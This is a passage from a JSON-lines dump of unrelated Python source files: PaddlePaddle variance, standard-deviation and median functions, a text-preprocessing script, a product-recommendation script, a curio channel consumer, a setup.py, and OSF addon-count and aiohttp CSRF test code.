reserve the reduced dimension(s)\n in the output Tensor. If ``keepdim`` is True, the dimensions of\n the output Tensor is the same as ``x`` except in the reduced\n dimensions(it is of size 1 in this case). Otherwise, the shape of\n the output Tensor is squeezed in ``axis`` . Default is False.\n name (str, optional): Name for the operation (optional, default is None).\n For more information, please refer to :ref:`api_guide_Name`.\n\n Returns:\n Tensor, results of variance along ``axis`` of ``x``, with the same data\n type as ``x``.\n\n Examples:\n .. code-block:: python\n\n import paddle\n\n x = paddle.to_tensor([[1.0, 2.0, 3.0], [1.0, 4.0, 5.0]])\n out1 = paddle.var(x)\n # [2.66666667]\n out2 = paddle.var(x, axis=1)\n # [1. 4.33333333]\n \"\"\"\n if not in_dygraph_mode():\n check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'var')\n\n u = mean(x, axis, True, name)\n out = paddle.sum((x - u)**2, axis, keepdim=keepdim, name=name)\n\n n = paddle.cast(paddle.numel(x), x.dtype) \\\n / paddle.cast(paddle.numel(out), x.dtype)\n if unbiased:\n one_const = paddle.ones([1], x.dtype)\n n = where(n > one_const, n - 1., one_const)\n out /= n\n return out\n\n\ndef std(x, axis=None, unbiased=True, keepdim=False, name=None):\n \"\"\"\n Computes the standard-deviation of ``x`` along ``axis`` .\n\n Args:\n x (Tensor): The input Tensor with data type float32, float64.\n axis (int|list|tuple, optional): The axis along which to perform\n standard-deviation calculations. ``axis`` should be int, list(int)\n or tuple(int). If ``axis`` is a list/tuple of dimension(s),\n standard-deviation is calculated along all element(s) of ``axis`` .\n ``axis`` or element(s) of ``axis`` should be in range [-D, D),\n where D is the dimensions of ``x`` . If ``axis`` or element(s) of\n ``axis`` is less than 0, it works the same way as :math:`axis + D` .\n If ``axis`` is None, standard-deviation is calculated over all\n elements of ``x``. Default is None.\n unbiased (bool, optional): Whether to use the unbiased estimation. If\n ``unbiased`` is True, the standard-deviation is calculated via the\n unbiased estimator. If ``unbiased`` is True, the divisor used in\n the computation is :math:`N - 1`, where :math:`N` represents the\n number of elements along ``axis`` , otherwise the divisor is\n :math:`N`. Default is True.\n keepdim (bool, optional): Whether to reserve the reduced dimension(s)\n in the output Tensor. If ``keepdim`` is True, the dimensions of\n the output Tensor is the same as ``x`` except in the reduced\n dimensions(it is of size 1 in this case). Otherwise, the shape of\n the output Tensor is squeezed in ``axis`` . Default is False.\n name (str, optional): Name for the operation (optional, default is None).\n For more information, please refer to :ref:`api_guide_Name`.\n\n Returns:\n Tensor, results of standard-deviation along ``axis`` of ``x``, with the\n same data type as ``x``.\n\n Examples:\n .. code-block:: python\n\n import paddle\n\n x = paddle.to_tensor([[1.0, 2.0, 3.0], [1.0, 4.0, 5.0]])\n out1 = paddle.std(x)\n # [1.63299316]\n out2 = paddle.std(x, axis=1)\n # [1. 2.081666]\n \"\"\"\n if not in_dygraph_mode():\n check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'std')\n\n out = var(**locals())\n return paddle.sqrt(out)\n\n\ndef numel(x, name=None):\n \"\"\"\n Returns the number of elements for a tensor, which is a int64 Tensor with shape [1] in static mode\n or a scalar value in imperative mode\n\n Args:\n x (Tensor): The input Tensor, it's data type can be bool, float16, float32, float64, int32, int64.\n\n Returns:\n Tensor: The number of elements for the input Tensor.\n\n Examples:\n .. code-block:: python\n\n import paddle\n \n x = paddle.full(shape=[4, 5, 7], fill_value=0, dtype='int32')\n numel = paddle.numel(x) # 140\n\n\n \"\"\"\n if in_dygraph_mode():\n return _C_ops.size(x)\n\n if not isinstance(x, Variable):\n raise TypeError(\"x must be a Tensor in numel\")\n helper = LayerHelper('numel', **locals())\n out = helper.create_variable_for_type_inference(\n dtype=core.VarDesc.VarType.INT64)\n helper.append_op(type='size', inputs={'Input': x}, outputs={'Out': out})\n return out\n\n\ndef median(x, axis=None, keepdim=False, name=None):\n \"\"\"\n Compute the median along the specified axis.\n\n Args:\n x (Tensor): The input Tensor, it's data type can be bool, float16, float32, float64, int32, int64.\n axis (int, optional): The axis along which to perform median calculations ``axis`` should be int.\n ``axis`` should be in range [-D, D), where D is the dimensions of ``x`` .\n If ``axis`` is less than 0, it works the same way as :math:`axis + D`.\n If ``axis`` is None, median is calculated over all elements of ``x``. Default is None.\n keepdim (bool, optional): Whether to reserve the reduced dimension(s)\n in the output Tensor. If ``keepdim`` is True, the dimensions of\n the output Tensor is the same as ``x`` except in the reduced\n dimensions(it is of size 1 in this case). Otherwise, the shape of\n the output Tensor is squeezed in ``axis`` . Default is False.\n name (str, optional): Name for the operation (optional, default is None).\n For more information, please refer to :ref:`api_guide_Name`.\n\n Returns:\n Tensor, results of median along ``axis`` of ``x``. If data type of ``x`` is float64, data type of results will be float64, otherwise data type will be float32.\n\n Examples:\n .. code-block:: python\n\n import paddle\n\n x = paddle.arange(12).reshape([3, 4])\n # x is [[0 , 1 , 2 , 3 ],\n # [4 , 5 , 6 , 7 ],\n # [8 , 9 , 10, 11]]\n\n y1 = paddle.median(x)\n # y1 is [5.5]\n\n y2 = paddle.median(x, axis=0)\n # y2 is [4., 5., 6., 7.]\n\n y3 = paddle.median(x, axis=1)\n # y3 is [1.5, 5.5, 9.5]\n\n y4 = paddle.median(x, axis=0, keepdim=True)\n # y4 is [[4., 5., 6., 7.]]\n\n \"\"\"\n if not isinstance(x, Variable):\n raise TypeError(\"In median, the input x should be a Tensor.\")\n is_flatten = axis is None\n dims = len(x.shape)\n if is_flatten:\n x = paddle.flatten(x)\n axis = 0\n else:\n if not isinstance(axis, int) or not (axis < dims and axis >= -dims):\n raise ValueError(\n \"In median, axis should be none or an integer in range [-rank(x), rank(x)).\"\n )\n if axis < 0:\n axis += dims\n sz = x.shape[axis]\n kth = sz >> 1\n tensor_topk, idx = paddle.topk(x, kth + 1, axis=axis, largest=False)\n dtype = 'float64' if x.dtype == core.VarDesc.VarType.FP64 else 'float32'\n if sz & 1 == 0:\n out_tensor = paddle.slice(\n tensor_topk, axes=[axis], starts=[kth - 1],\n ends=[kth]) + paddle.slice(\n tensor_topk, axes=[axis], starts=[kth], ends=[kth + 1])\n out_tensor = paddle.cast(out_tensor, dtype=dtype) / 2\n else:\n out_tensor = paddle.cast(\n paddle.slice(\n tensor_topk, axes=[axis], starts=[kth], ends=[kth + 1]),\n dtype=dtype)\n if not keepdim or is_flatten:\n if not is_flatten:\n newshape = x.shape[:axis] + x.shape[axis + 1:]\n elif not keepdim:\n newshape = [1]\n else:\n newshape = [1] * dims\n else:\n newshape = out_tensor.shape\n out_tensor = out_tensor.reshape(newshape, name=name)\n return out_tensor\n"} {"ext": "py", "sha": "1a2f10fd6a45707e43e946a6846e81991cb09110", "content": "# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nfrom scrapy.item import Item, Field\n\n\nclass XiaobaiheItem(Item):\n # define the fields for your item here like:\n # name = scrapy.Field()\n username = Field()\n text = Field()\n url = Field()\n"} {"ext": "py", "sha": "1a2f11bfbdbd20d17ab6370d274d33ac02747150", "content": "import pyaf.Bench.TS_datasets as tsds\nimport pyaf.tests.artificial.process_artificial_dataset as art\n\n\n\n\nart.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = \"MovingMedian\", cycle_length = 12, transform = \"None\", sigma = 0.0, exog_count = 20, ar_order = 0);"} {"ext": "py", "sha": "1a2f11e2e7df60a0c636e06ecccbea6464b55fb8", "content": "\"\"\" Tests for the various cli programs \"\"\"\n\nfrom pyontutils.integration_test_helper import _TestCliBase, Folders\n\n\nclass TestCli(Folders, _TestCliBase):\n commands = (\n ['googapis', '--help'],\n ['graphml-to-ttl', '--help'],\n ['necromancy', '--help'],\n ['ontload', '--help'],\n ['overlaps', '--help'],\n ['qnamefix', '--help'],\n ['scigraph-codegen', '--help'],\n ['scig', '--help'],\n ['ttlfmt', '--help'],\n )\n"} {"ext": "py", "sha": "1a2f11ff27e35d8d4438e0a97443a7435d568591", "content": "#!/usr/bin/python\n\nimport math\nimport matplotlib.pyplot as plt\nfrom graphtheory.structures.edges import Edge\nfrom graphtheory.structures.graphs import Graph\nfrom graphtheory.structures.factory import GraphFactory\nfrom graphtheory.structures.points import Point\nfrom graphtheory.forests.treeplot import TreePlot\nfrom graphtheory.forests.treeplot import TreePlotRadiusAngle\n\nV = 20\ngf = GraphFactory(Graph)\nG = gf.make_tree(V)\n#G.show()\nassert G.e() == V-1\n\nalgorithm = TreePlotRadiusAngle(G)\nalgorithm.run()\n#print ( algorithm.point_dict ) # (radius, angle)\n\nD = dict() # node ---> point on the plane\nfor node in algorithm.point_dict:\n (radius, angle) = algorithm.point_dict[node]\n D[node] = Point(radius * math.cos(angle), radius * math.sin(angle))\n#print ( D )\n\nfor edge in G.iteredges():\n x = [D[edge.source].x, D[edge.target].x]\n y = [D[edge.source].y, D[edge.target].y]\n plt.plot(x, y, 'k-') # black line\n\nx = [D[node].x for node in G.iternodes()]\ny = [D[node].y for node in G.iternodes()]\nplt.plot(x, y, 'bo') # blue circle\n\nplt.title(\"Random tree\")\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.show()\n\n# EOF\n"} {"ext": "py", "sha": "1a2f12775a7a02c804df13765fdebe726aaa3ea6", "content": "import pandas as pd\nimport numpy as np\nimport joblib\nimport Levenshtein\nimport argparse\nimport ast\nfrom scipy import stats\n\nfrom src import nlp_preprocessing\n\ndef preprocess_txt(txt: str):\n \"\"\"Executa preprocessamento textual padrão\"\"\"\n cleaned_txt = nlp_preprocessing.clean_text(txt)\n token_txt = nlp_preprocessing.custom_tokenizer(cleaned_txt)\n return \" \".join(token_txt)\n\ndef get_top_docs(query, cleaned_doc_list, doc_titles, get_titles=True):\n \"\"\"Gera as recomedações a partir de uma query e listas de referência\"\"\"\n cleaned_query = preprocess_txt(query)\n dists = [Levenshtein.distance(cleaned_query, doc)\n for doc in cleaned_doc_list]\n\n mask = np.array(dists).argsort()[:10]\n if get_titles:\n return doc_titles.iloc[mask].tolist()\n else:\n return doc_titles.iloc[mask].index.tolist()\n\ndef load_data():\n \"\"\"Carrega os dados\"\"\"\n df = pd.concat([\n pd.read_pickle(\"data/train_query.pickle\"),\n pd.read_pickle(\"data/test_query.pickle\")\n ])\n return df\n\n\ndef series_mode(serie: pd.Series):\n \"\"\"Calcula a moda de uma série\"\"\"\n return stats.mode(serie)[0][0]\n\ndef remove_duplicates(df, group=\"product_id\",\n num_cols=[\"price\", \"weight\", \"minimum_quantity\"],\n cat_cols=[\"title\", \"concatenated_tags\"]) -> pd.DataFrame:\n \"\"\"Função que remove os registros duplicados juntando os por média e moda\n a depender dos tipos de coluna\"\"\"\n mode_stats = {col: series_mode for col in cat_cols}\n mean_stats = {col: \"mean\" for col in num_cols}\n agg_stats = dict(**mode_stats, **mean_stats)\n return df.groupby(group).agg(agg_stats)\n\ndef make_predictions(query, clf_model):\n \"\"\"Função que realiza as recomendações com predição de categoria\n majoritária\"\"\"\n df = load_data()\n prod_titles = (df[[\"product_id\", \"title\"]].\n drop_duplicates().set_index(\"product_id\")[\"title\"])\n cleaned_prod_titles = [preprocess_txt(txt) for txt in prod_titles]\n prod_id_select = get_top_docs(query,\n cleaned_prod_titles,\n prod_titles,\n False)\n selected_df = df.loc[df[\"product_id\"].isin(prod_id_select)]\n selected_df = remove_duplicates(selected_df)\n predicted_cats = clf_model.predict(selected_df)\n major_cat = stats.mode(predicted_cats)[0][0]\n print(major_cat)\n for _id, title in selected_df[\"title\"].iteritems():\n print(f\"{_id} - {title}\")\n \n \n\n# função auxiliar do modelo de classificação\ndef select_txt(X: pd.DataFrame, col: str):\n return X[col]\n \n# função auxiliar do modelo de classificação\ndef select_base_features(X: pd.DataFrame):\n return X[[\"price\", \"weight\", \"minimum_quantity\"]]\n\n\n\ndef load_args() -> pd.DataFrame:\n \"\"\"Função de carregamento de configurações.\n\n Returns:\n pd.DataFrame: resultado a ser categorizado.\n \"\"\"\n # criando os atributos que vão ser recebidos e parseando-os\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\",\n \"--category\",\n help=\"Texto de registro a ser categorizado\",\n type=str)\n parser.add_argument(\"-r\",\n \"--recommendation\",\n help=\"Sistema de recomendação de produtos\",\n type=str)\n args = parser.parse_args()\n \n # extraindo dos atributos recebidos o registro a ser categorizado\n # e adequando-o para a predição\n if args.category is not None:\n product_dict = ast.literal_eval(args.category)\n product_df = pd.Series(product_dict).to_frame().T\n else:\n product_df = None\n \n return product_df, args.recommendation\n\ndef predict_single_category(df, clf_model):\n product_category = clf_model.predict(df)[0]\n print(product_category)\n\ndef main():\n # carregando o modelo\n rf_clf_pipeline = joblib.load(\"assets/category_rf_clf_pipeline.joblib\")\n # carregando o registro a ser categorizado\n product_df, query = load_args()\n # fazendo a previsão da categoria\n if product_df is not None:\n predict_single_category(product_df, rf_clf_pipeline)\n if query is not None:\n make_predictions(query, rf_clf_pipeline)\n \n\nif __name__ == \"__main__\":\n main()"} {"ext": "py", "sha": "1a2f129fc6e9152c4f93a72acd1cfc2e585a8c32", "content": "import re\nimport os\nimport struct\nimport argparse\nimport collections\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom tensorflow.core.example import example_pb2\nfrom utils import is_num\n\n\nparser = argparse.ArgumentParser()\n\n# Path\nparser.add_argument('--dataset', type=str, choices=['restaurant', 'beer'], default='restaurant')\nparser.add_argument('--vocab_fname', type=str, default='./data/vocab.txt')\n\nargs = parser.parse_args()\n\n\"\"\"\nPreprocessing script file\n\"\"\"\n\n\ndef tokenize_sent(sent, lemtzr, stopword):\n tokens = tokenize(sent.strip().lower())\n tokens = re.sub(r'[^A-Za-z0-9]+',' ', ' '.join(tokens))\n tokens = [tok for tok in tokens.split() if tok not in stopword]\n tokens = [tok if not is_num(tok) else '' for tok in tokens]\n tokens = [lemtzr.lemmatize(tok) for tok in tokens]\n return tokens\n\n\ndef tokenize_train_file(fname):\n \"\"\"\n Tokenize the raw train data(unlabeled).\n \"\"\"\n split_fname = fname.split('/')\n new_fname = '/'.join([el if idx != len(split_fname) - 1 else 'parsed_' + el for idx, el in enumerate(split_fname)])\n if os.path.exists(new_fname): return new_fname\n\n with open(fname, 'r', encoding='utf8') as f:\n ls = f.readlines()\n\n parsed_data = []\n lemtzr = WordNetLemmatizer()\n stopword = stopwords.words('english')\n\n for line in ls:\n tokens = tokenize_sent(line, lemtzr, stopword)\n parsed_data.append(tokens)\n\n save_file(parsed_data, new_fname)\n return new_fname\n\n\ndef tokenize_labeled_test_file(fname, label_fname):\n \"\"\"\n Tokenize the raw test data (labelled).\n \"\"\"\n split_fname = fname.split('/')\n new_fname = '/'.join([el if idx != len(split_fname) - 1 else 'parsed_' + el for idx, el in enumerate(split_fname)])\n label_map_fname = '/'.join([el if idx != len(split_fname) - 1 else 'label_map.txt' for idx, el in enumerate(split_fname)])\n if os.path.exists(new_fname): return label_map_fname, new_fname\n\n with open(fname, 'r', encoding='utf8') as f1, open(label_fname, 'r', encoding='utf8') as f2:\n ls1, ls2 = f1.readlines(), f2.readlines()\n\n parsed_data = []\n lemtzr = WordNetLemmatizer()\n stopword = stopwords.words('english')\n\n for line in ls1:\n tokens = tokenize_sent(line, lemtzr, stopword)\n parsed_data.append(tokens)\n\n assert len(ls1) == len(ls2) == len(parsed_data)\n\n new_parsed, new_ls2 = [], []\n for parsed, label in zip(parsed_data, ls2):\n if 'Positive' in label or 'Neutral' in label:\n continue\n new_parsed.append(parsed)\n new_ls2.append(label)\n\n assert len(new_parsed) == len(new_ls2)\n parsed_data, ls2 = new_parsed, new_ls2\n\n label_text = list(set([tok for line in ls2 for tok in line.strip().split()]))\n\n label_map = dict()\n print(\"Label for this dataset with assigned index is as follows.\")\n for idx, label in enumerate(label_text):\n print('{}: {}'.format(label, idx))\n label_map[label] = idx\n with open(label_map_fname, 'w') as f:\n for key,val in label_map.items():\n f.write(\"{} {} ||| \".format(key, val))\n\n for idx, data in enumerate(parsed_data):\n labels = ls2[idx].strip().split()\n assert all([label in list(label_map.keys()) for label in labels])\n parsed_data[idx].insert(0, '|||')\n for label in labels:\n parsed_data[idx].insert(0, str(label_map[label]))\n\n save_file(parsed_data, new_fname)\n return label_map_fname, new_fname\n\n\ndef build_vocab(parsed_train_fname, vocab_file, vocab_size=30000):\n \"\"\"\n Build vocab based on frequency of each word in train set.\n Save vocab file and return vocab list.\n \"\"\"\n if os.path.exists(vocab_file):\n with open(vocab_file, 'r', encoding='utf8') as f:\n ls = f.readlines()\n assert len(ls) == vocab_size\n vocab = [line.strip() for line in ls]\n return vocab\n\n with open(parsed_train_fname, 'r', encoding='utf8') as f:\n ls = f.readlines()\n tokens = [tok for line in ls for tok in line.strip().split()]\n counts = dict(collections.Counter(tokens))\n\n import operator\n vocab = sorted(counts.items(), key=operator.itemgetter(1), reverse=True)\n print(\"TOTAL VOCAB SIZE: {}\".format(len(vocab)))\n\n for idx,tok in enumerate(vocab):\n if tok[1] <= 10:\n print(\"WORDS MORE THAN 10: {}\".format(idx))\n break\n vocab = [tok[0] for tok in vocab][:idx]\n\n vocab.append('')\n vocab.append('')\n\n assert all([isinstance(tok, str) for tok in vocab])\n with open(vocab_file, 'w') as f:\n f.write('\\n'.join([tok for tok in vocab]))\n return vocab\n\n\ndef save_file(data, new_fname):\n \"\"\"\n Change the \"raw_fname\" into parsed fname, then save \"data\" into parsed fname.\n \"\"\"\n assert isinstance(data, list)\n\n with open(new_fname, 'w') as f: f.write('\\n'.join([\" \".join(one_sample) for one_sample in data]))\n\n\ndef tokenize(sent):\n assert isinstance(sent, str)\n return word_tokenize(sent)\n\n\ndef make_binary_dataset(fname, is_label=False):\n \"\"\"\n Make a binary data file for learning.\n \"\"\"\n binary_fname = fname.replace('.txt', '.bin')\n if os.path.exists(binary_fname): return\n\n with open(fname, 'r', encoding='utf8') as f:\n ls = f.readlines()\n data = [line.strip() for line in ls]\n\n assert all(['|||' in dat for dat in data]) if is_label else all(['|||' not in dat for dat in data])\n\n with open(binary_fname, 'wb') as f:\n for line in data:\n if is_label:\n split_line = line.split('|||')\n assert len(split_line) == 2\n label, text = split_line[0].strip(), split_line[1].strip()\n else:\n text = line\n example = example_pb2.Example()\n example.features.feature['text'].bytes_list.value.extend([text.encode()])\n if is_label:\n example.features.feature['label'].bytes_list.value.extend([label.encode()])\n example_str = example.SerializeToString()\n str_len = len(example_str)\n f.write(struct.pack('q', str_len))\n f.write(struct.pack('%ds' % str_len, example_str))\n return\n\n\ndef main():\n train_fname = './data/datasets/{}/train.txt'.format(args.dataset)\n test_fname = './data/datasets/{}/test.txt'.format(args.dataset)\n test_label_fname = './data/datasets/{}/test_label.txt'.format(args.dataset)\n vocab_fname = './data/vocab.txt'\n vocab_size = args.vocab_size\n\n parsed_train_fname = tokenize_train_file(train_fname)\n label_map, parsed_test_fname = tokenize_labeled_test_file(test_fname, test_label_fname)\n build_vocab(parsed_train_fname, vocab_fname, vocab_size=vocab_size)\n\n make_binary_dataset(parsed_train_fname, False)\n make_binary_dataset(parsed_test_fname, True)\n\n\nif __name__ == '__main__':\n main()"} {"ext": "py", "sha": "1a2f13906d5d70ee00a1c331f3fdf608d4b11f45", "content": "from pykit import logutil\n\nprint logutil.get_root_log_fn()\n"} {"ext": "py", "sha": "1a2f14470add748350681a749085c0b0bb7f4168", "content": "#!/usr/bin/env python3\n\nfrom os import environ\nfrom curio import Channel, run\nsyncword = environ.get('RRIDBOT_SYNC')\nchan = ('localhost', 12345)\nasync def consumer():\n ch = Channel(chan)\n c = await ch.accept(authkey=syncword.encode())\n myset = set()\n while True:\n try:\n msg = await c.recv()\n except (EOFError, ConnectionResetError) as e: # in the event that the client closes\n print('resetting')\n myset = set()\n c = await ch.accept(authkey=syncword.encode())\n continue\n if msg is None: # explicit reset\n myset = set()\n else:\n op, uri = msg.split(' ', 1)\n print(op, uri)\n if op == 'add':\n if uri in myset:\n await c.send(True)\n else:\n myset.add(uri)\n await c.send(False)\n elif op == 'del':\n myset.discard(uri)\n await c.send(False)\n else:\n await c.send('ERROR')\n print(myset)\n\nif __name__ == '__main__':\n run(consumer)\n\n"} {"ext": "py", "sha": "1a2f1469fdb17a381028170642ef12b2ee49d969", "content": "from setuptools import setup\n\nsetup(\n name = 'PyXiaomiGateway',\n packages = ['xiaomi_gateway'],\n install_requires=['cryptography>=2.1.1'],\n version = '0.11.1',\n description = 'A library to communicate with the Xiaomi Gateway',\n author='Daniel Hoyer Iversen',\n url='https://github.com/Danielhiversen/PyXiaomiGateway/',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Other Environment',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Home Automation',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ]\n)\n"} {"ext": "py", "sha": "1a2f146b723483bb72f845343fd511e3a7fafc90", "content": "from nose.tools import * # noqa\n\nfrom framework.auth.core import Auth\n\nfrom tests.base import OsfTestCase\nfrom tests.factories import AuthUserFactory, ProjectFactory, BookmarkCollectionFactory\n\nfrom scripts.analytics.addon_snapshot import AddonSnapshot\n\nfrom website.models import Node\nfrom framework.auth.core import User\nfrom website.settings import ADDONS_AVAILABLE\nfrom addons.github.tests.factories import GitHubAccountFactory\nfrom addons.github.model import GitHubNodeSettings, GitHubUserSettings\nfrom addons.googledrive.tests.factories import GoogleDriveAccountFactory\nfrom addons.googledrive.model import GoogleDriveNodeSettings, GoogleDriveUserSettings\n\n\nclass TestAddonCount(OsfTestCase):\n def setUp(self):\n super(TestAddonCount, self).setUp()\n self.user = AuthUserFactory()\n self.node = ProjectFactory(creator=self.user)\n self.user.add_addon('github')\n self.user_addon = self.user.get_addon('github')\n\n self.external_account = GitHubAccountFactory(display_name='hmoco1')\n\n self.user_settings = self.user.get_or_add_addon('github')\n\n self.user_settings.save()\n self.user.external_accounts.append(self.external_account)\n self.user.save()\n self.node.add_addon('github', Auth(self.user))\n self.node_addon = self.node.get_addon('github')\n self.node_addon.user = self.user.fullname\n self.node_addon.repo = '29 #Strafford APTS'\n self.node_addon.user_settings = self.user_addon\n self.node_addon.external_account = self.external_account\n self.node_addon.save()\n\n self.user_settings.grant_oauth_access(\n node=self.node,\n external_account=self.external_account,\n )\n def tearDown(self):\n GitHubNodeSettings.remove()\n GitHubUserSettings.remove()\n GoogleDriveNodeSettings.remove()\n GoogleDriveUserSettings.remove()\n\n def test_run_for_all_addon(self):\n results = AddonSnapshot().get_events()\n names = [res['provider']['name'] for res in results]\n for addon in ADDONS_AVAILABLE:\n assert_in(addon.short_name, names)\n\n def test_one_user_one_node_one_addon(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['users']['enabled'], 1)\n assert_equal(github_res['nodes']['total'], 1)\n\n def test_one_user_one_node_one_addon_one_node_linked(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['users']['enabled'], 1)\n assert_equal(github_res['nodes']['total'], 1)\n\n def test_one_user_with_multiple_githubs(self):\n oauth_settings2 = GitHubAccountFactory(display_name='hmoco2')\n oauth_settings2.save()\n self.user.external_accounts.append(oauth_settings2)\n self.user.save()\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['users']['enabled'], 1)\n\n def test_one_user_with_multiple_addons(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n googledrive_res = [res for res in results if res['provider']['name'] == 'googledrive'][0]\n assert_equal(github_res['users']['enabled'], 1)\n assert_equal(googledrive_res['users']['enabled'], 0)\n\n self.user.add_addon('googledrive')\n oauth_settings = GoogleDriveAccountFactory()\n oauth_settings.save()\n self.user.external_accounts.append(oauth_settings)\n self.user.save()\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n googledrive_res = [res for res in results if res['provider']['name'] == 'googledrive'][0]\n assert_equal(github_res['users']['enabled'], 1)\n assert_equal(googledrive_res['users']['enabled'], 1)\n\n def test_many_users_each_with_a_different_github(self):\n user = AuthUserFactory()\n user.add_addon('github')\n oauth_settings2 = GitHubAccountFactory(display_name='hmoco2')\n oauth_settings2.save()\n user.external_accounts.append(oauth_settings2)\n user.save()\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['users']['enabled'], 2)\n assert_equal(github_res['users']['authorized'], 1)\n assert_equal(github_res['users']['linked'], 1)\n\n def test_many_users_each_with_the_same_github_enabled(self):\n user = AuthUserFactory()\n user.add_addon('github')\n user.external_accounts.append(self.external_account)\n user.save()\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['users']['enabled'], 2)\n\n def test_github_enabled_not_linked_or_authorized(self):\n user = AuthUserFactory()\n user.add_addon('github')\n user.external_accounts.append(self.external_account)\n user.save()\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['users']['enabled'], 2)\n assert_equal(github_res['users']['authorized'], 1)\n assert_equal(github_res['users']['linked'], 1)\n\n def test_one_node_with_multiple_addons(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n googledrive_res = [res for res in results if res['provider']['name'] == 'googledrive'][0]\n assert_equal(github_res['nodes']['total'], 1)\n assert_equal(googledrive_res['nodes']['total'], 0)\n\n self.user.add_addon('googledrive')\n user_addon = self.user.get_addon('googledrive')\n oauth_settings = GoogleDriveAccountFactory()\n oauth_settings.save()\n self.user.external_accounts.append(oauth_settings)\n self.user.save()\n self.node.add_addon('googledrive', Auth(self.user))\n node_addon = self.node.get_addon('googledrive')\n node_addon.user = self.user.fullname\n node_addon.user_settings = user_addon\n node_addon.external_account = oauth_settings\n node_addon.save()\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n googledrive_res = [res for res in results if res['provider']['name'] == 'googledrive'][0]\n assert_equal(github_res['nodes']['total'], 1)\n assert_equal(googledrive_res['nodes']['total'], 1)\n\n def test_many_nodes_with_one_addon(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['nodes']['total'], 1)\n\n node = ProjectFactory(creator=self.user)\n node.add_addon('github', Auth(self.user))\n node_addon = node.get_addon('github')\n node_addon.user = self.user.fullname\n node_addon.repo = '8 (circle)'\n node_addon.user_settings = self.user_addon\n node_addon.external_account = self.external_account\n node_addon.save()\n node.save()\n\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['nodes']['total'], 2)\n\n def test_node_count_deleted_addon(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['nodes']['deleted'], 0)\n\n node = ProjectFactory(creator=self.user)\n node.add_addon('github', Auth(self.user))\n node_addon = node.get_addon('github')\n node_addon.delete()\n\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['nodes']['deleted'], 1)\n\n def test_node_count_disconected_addon(self):\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['nodes']['disconnected'], 0)\n\n node = ProjectFactory(creator=self.user)\n node.add_addon('github', Auth(self.user))\n node_addon = node.get_addon('github')\n node_addon.external_account = None\n node_addon.save()\n\n results = AddonSnapshot().get_events()\n github_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(github_res['nodes']['disconnected'], 1)\n\n def test_all_users_have_wiki_osfstorage_enabled(self):\n all_user_count = User.find().count()\n results = AddonSnapshot().get_events()\n osfstorage_res = [res for res in results if res['provider']['name'] == 'osfstorage'][0]\n wiki_res = [res for res in results if res['provider']['name'] == 'osfstorage'][0]\n\n assert_equal(osfstorage_res['users']['enabled'], all_user_count)\n assert_equal(wiki_res['users']['enabled'], all_user_count)\n\n def test_wiki_deleted_shows_as_deleted(self):\n node = ProjectFactory(creator=self.user)\n node.delete_addon('wiki', auth=Auth(self.user))\n\n results = AddonSnapshot().get_events()\n wiki_res = [res for res in results if res['provider']['name'] == 'wiki'][0]\n\n assert_equal(wiki_res['nodes']['deleted'], 1)\n\n def test_node_settings_has_no_owner_not_connected(self):\n self.node_addon.owner = None\n self.node_addon.save()\n\n results = AddonSnapshot().get_events()\n storage_res = [res for res in results if res['provider']['name'] == 'github'][0]\n assert_equal(storage_res['nodes']['connected'], 0)\n\n def test_bookmark_collection_not_counted(self):\n BookmarkCollectionFactory(creator=self.user)\n all_node_count = Node.find().count()\n\n results = AddonSnapshot().get_events()\n storage_res = [res for res in results if res['provider']['name'] == 'osfstorage'][0]\n assert_equal(storage_res['nodes']['connected'], all_node_count - 1)\n"} {"ext": "py", "sha": "1a2f168617074cd9c152689e717fcdbd2d133936", "content": "import aiohttp_csrf\nimport pytest\nfrom aiohttp import web\n\nSESSION_NAME = COOKIE_NAME = 'csrf_token'\nFORM_FIELD_NAME = HEADER_NAME = 'X-CSRF-TOKEN'\n\n\n@pytest.yield_fixture\ndef init_app():\n def go(\n loop,\n policy,\n storage,\n handlers,\n error_renderer=None,\n ):\n app = web.Application()\n\n kwargs = {\n 'policy': policy,\n 'storage': storage,\n }\n\n if error_renderer is not None:\n kwargs['error_renderer'] = error_renderer\n\n aiohttp_csrf.setup(app, **kwargs)\n\n for method, url, handler in handlers:\n app.router.add_route(\n method,\n url,\n handler,\n )\n\n return 